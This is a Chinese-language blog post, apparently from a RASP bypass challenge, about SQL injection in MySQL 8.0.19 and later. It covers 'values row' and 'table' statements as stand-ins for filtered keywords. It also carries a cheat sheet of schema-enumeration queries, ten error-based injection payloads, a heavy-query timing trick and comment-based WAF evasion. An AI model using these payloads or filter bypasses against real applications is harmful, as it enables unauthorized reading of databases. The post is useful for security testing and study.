<!doctype html>
<html lang=&#34;en&#34;>
<head><meta name="generator" content="Hexo 3.9.0">
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="theme-color" content="#070807">
  <title>MySQL 8.0.19之后SQL注入可以利用的新特性 · Deen&#39;s blog</title>
  <link rel="icon" href="/images/favicon.ico">
  <link rel="stylesheet" href="/css/style.css?v=1.1.2"><!-- hexo-inject:begin --><!-- hexo-inject:end -->
</head>

<body>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><main class="site-shell">
    <header class="site-header">
  <nav class="site-nav" aria-label="Primary navigation">
    
      <a href="/">Home</a>
    
      <a href="/archives/">Archives</a>
    
      <a href="/about/">About</a>
    
  </nav>
</header>
<div class="header-rule" aria-hidden="true"></div>

    <article class="post-detail" itemscope itemtype="https://schema.org/BlogPosting">
  <header class="post-header">
    <h1 itemprop="headline">MySQL 8.0.19之后SQL注入可以利用的新特性</h1>
    <p class="post-meta">
      <time datetime="2022-02-20T13:46:22.000Z" itemprop="datePublished">2022-02-20</time>
      
    </p>
  </header>
  <div class="article-content" itemprop="articleBody"><h2 id="0x00-背景"><a href="#0x00-背景" class="headerlink" title="0x00 背景"></a>0x00 背景</h2><p>最近绕个什么RASP挑战赛，绕过了前面的什么token限制，什么函数执行限制，绕到后面了，发现RASP封禁了如下：</p>
<ul>
<li>union select</li>
<li>select from</li>
</ul>
<ol>
<li>select不能出现在union后面</li>
<li>select和from中间不能存在其他字符<br>……</li>
</ol>
<p>什么大小写什么编码什么各种统统不行…….</p>
<p>看到了数据库版本是8.0.16，想起来MySQL8的新特性可以利用，靠试了半天……<br>一查文档</p>
<blockquote>
<p>TABLE is a DML statement introduced in MySQL 8.0.19 which returns rows and columns of the named table.</p>
</blockquote>
<p>所以重点：<strong>8.0.19</strong> 之后的MySQL版本才行</p>
<h2 id="0x01-新特性"><a href="#0x01-新特性" class="headerlink" title="0x01 新特性"></a>0x01 新特性</h2><p>一个MySQL8的在在线环境：<a href="https://extendsclass.com/mysql-online.html">https://extendsclass.com/mysql-online.html</a></p>
<h3 id="代替union-select"><a href="#代替union-select" class="headerlink" title="代替union select"></a>代替union select</h3><p><code>union values row(1,2,3)--+</code> 等同于 <code>union select 1,2,3</code></p>
<p><img src="https://1-1252869755.cos.ap-guangzhou.myqcloud.com/20220220225844.png" alt=""></p>
<h3 id="代替select-from"><a href="#代替select-from" class="headerlink" title="代替select from"></a>代替select from</h3><p><code>table scientist limit 1</code> 等同于 <code>select * scientist limit 1</code></p>
<p>常用于盲注：</p>
<p><img src="https://1-1252869755.cos.ap-guangzhou.myqcloud.com/20220220230700.png" alt=""></p>
<p>通过比较符实现布尔型盲注</p>
<p>没了，好像就这些了</p>
<h2 id="0x02-笔记备忘"><a href="#0x02-笔记备忘" class="headerlink" title="0x02 笔记备忘"></a>0x02 笔记备忘</h2><ol>
<li><p>获取表名：</p>
<ul>
<li><code>select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()</code></li>
<li><code>select group_concat(table_name) from mysql.innodb_index_stats where database_name in(database())</code></li>
</ul>
</li>
<li><p>获取列名：<code>union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=&#39;xxx&#39;</code></p>
</li>
<li><p>报错注入（面试还问有多少种……大无语）：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">1.floor()</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> (<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">user</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)a);</span><br><span class="line"></span><br><span class="line">2.extractvalue()</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> (extractvalue(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>)));</span><br><span class="line"></span><br><span class="line">3.updatexml()</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> (updatexml(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>),<span class="number">1</span>));</span><br><span class="line"></span><br><span class="line">4.geometrycollection()</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> geometrycollection((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</span><br><span class="line"></span><br><span class="line">5.multipoint()</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> multipoint((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</span><br><span class="line"></span><br><span class="line">6.polygon()</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> polygon((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</span><br><span class="line"></span><br><span class="line">7.multipolygon()</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> multipolygon((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</span><br><span class="line"></span><br><span class="line">8.linestring()</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> linestring((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</span><br><span class="line"></span><br><span class="line">9.multilinestring()</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> multilinestring((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</span><br><span class="line"></span><br><span class="line">10.exp()</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> <span class="keyword">exp</span>(~(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a));</span><br></pre></td></tr></table></figure>
</li>
<li><p>其他</p>
<ul>
<li><code>replace(repeat(lpad(&#39;a&#39;,222222,&#39;a&#39;),2),&#39;aa&#39;,&#39;b&#39;)</code> 根据数据库性能来定，在sleep封禁的情况下</li>
</ul>
</li>
</ol>
<h2 id="0x03-后记"><a href="#0x03-后记" class="headerlink" title="0x03 后记"></a>0x03 后记</h2><p>回家想再测一下。。。。。环境变了，把我payload封了。。。。gg</p>
<p>梳理测试思路</p>
<ul>
<li>测试运算符</li>
<li>测试注释符，组合测试</li>
<li>引入字符串进行关键字屏蔽测试，如union select 、 select from</li>
<li>字符串中引入unicode字符进行编码测试</li>
<li>超大数据测试</li>
<li>是否会存在优先匹配的情况，如WAF匹配到单引号，就会一直匹配下去，这时可以把单引号放在 /**/ 注释当中</li>
<li>使用<code>/**/</code> <code>/*!00000select*/</code>绕过，如 <code>user(</code> 被屏蔽，可转化为 <code>/*!00000user*//**!00000()/</code></li>
</ul>
</div>
</article>

    <footer class="site-footer">
  Copyright © 2026 Deen&#39;s blog
</footer>

  </main>
  <script>
    (function () {
      var terminal = document.querySelector('[data-terminal-intro]');
      var reduceMotion = window.matchMedia('(prefers-reduced-motion: reduce)').matches;
      if (!terminal || reduceMotion) return;

      var introSeen = false;
      try { introSeen = window.sessionStorage.getItem('deen-terminal-intro-seen') === '1'; } catch (error) {}
      if (introSeen) return;
      try { window.sessionStorage.setItem('deen-terminal-intro-seen', '1'); } catch (error) {}

      var root = document.documentElement;
      var lines = terminal.querySelectorAll('.terminal-command .terminal-typed');
      var output = terminal.querySelector('.terminal-output');
      var cursors = terminal.querySelectorAll('.terminal-cursor');
      var list = document.querySelector('.post-list');
      var pagination = document.querySelector('.terminal-status');
      var text = Array.prototype.map.call(lines, function (line) { return line.textContent; });
      var delay = function (milliseconds) { return new Promise(function (resolve) { window.setTimeout(resolve, milliseconds); }); };
      var type = function (line, value) {
        line.textContent = '';
        return new Promise(function (resolve) {
          var index = 0;
          var tick = function () {
            line.textContent += value.charAt(index++);
            if (index < value.length) window.setTimeout(tick, 28);
            else resolve();
          };
          tick();
        });
      };

      root.classList.add('terminal-booting');
      cursors[0].classList.add('is-active');
      output.classList.remove('is-visible');
      type(lines[0], text[0])
        .then(function () {
          cursors[0].classList.remove('is-active');
          output.classList.add('is-visible');
          return delay(260);
        })
        .then(function () { cursors[1].classList.add('is-active'); })
        .then(function () { return type(lines[1], text[1]); })
        .then(function () {
          cursors[1].classList.remove('is-active');
          Array.prototype.forEach.call(list.children, function (item, index) {
            item.style.transitionDelay = (index * 42) + 'ms';
            item.classList.add('is-visible');
          });
          if (pagination) pagination.classList.add('is-visible');
          root.classList.remove('terminal-booting');
        });
    }());

    document.querySelectorAll('.article-content .highlight').forEach(function (block) {
      var code = block.querySelector('code, td.code, pre');
      if (!code) return;
      var className = block.className.split(/\s+/).find(function (name) { return name !== 'highlight'; });
      var toolbar = document.createElement('div');
      toolbar.className = 'code-toolbar';
      toolbar.innerHTML = '<span class="code-controls" aria-hidden="true"><i></i><i></i><i></i></span><span class="code-language"></span><button type="button" data-copy-code>Copy</button>';
      toolbar.querySelector('.code-language').textContent = className || 'text';
      block.prepend(toolbar);
      var table = block.querySelector('table');
      if (table) {
        var scroller = document.createElement('div');
        scroller.className = 'code-scroll';
        table.parentNode.insertBefore(scroller, table);
        scroller.appendChild(table);
      }
    });
    document.addEventListener('click', function (event) {
      var button = event.target.closest('[data-copy-code]');
      if (!button) return;
      var code = button.closest('.highlight, .code-block').querySelector('code, td.code, pre');
      if (!code || !navigator.clipboard) return;
      navigator.clipboard.writeText(code.innerText).then(function () {
        button.textContent = 'Copied';
        window.setTimeout(function () { button.textContent = 'Copy'; }, 1400);
      });
    });
  </script><!-- hexo-inject:begin --><!-- hexo-inject:end -->
</body>
</html>
